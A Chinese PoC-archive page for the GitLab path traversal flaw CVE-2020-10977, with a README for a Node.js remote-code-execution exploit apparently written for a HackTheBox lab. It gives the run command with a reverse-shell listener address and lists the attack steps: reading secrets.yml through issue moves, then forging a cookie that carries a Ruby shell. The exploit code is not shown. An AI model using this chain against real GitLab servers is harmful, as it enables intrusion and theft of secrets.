关联漏洞
标题:
GitLab 路径遍历漏洞
(CVE-2020-10977)
描述:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
描述
Gitlab v12.4.0-8.1 RCE
介绍
### GitLab v12.4.0-12.8.1 RCE
Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me and the HTML parsing stuff seemed cumbersome so I rewrote it in js.
#### Usage
Start a reverse shell handler in the usual way, then run this script with:
```shell
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
node gitlab_rce.js
```
A proxy may be specified with `TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"`.
Burp is particularly useful for debugging with this.
#### What this does
1. checks if target is up
2. if the provided user exists, skip to 5
3. scan for a username that doesn't already exist
4. create that user
5. attempt sign in
6. create two empty projects
7. create an new issue ticket with a malicious link in it's body in the first project
8. move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
9. fetches the target file, in this case we want the secrets.yml for the secret_key_base
10. use secret_key_base to mint an evil cookie with our Ruby shell and pass it to GitLab
文件快照
[4.0K] /data/pocs/7cc19a9a5e2b4154cf7a93eff0709de598bc04a5
├── [8.8K] gitlab_rce.js
├── [ 550] package.json
├── [104K] package-lock.json
└── [1.2K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。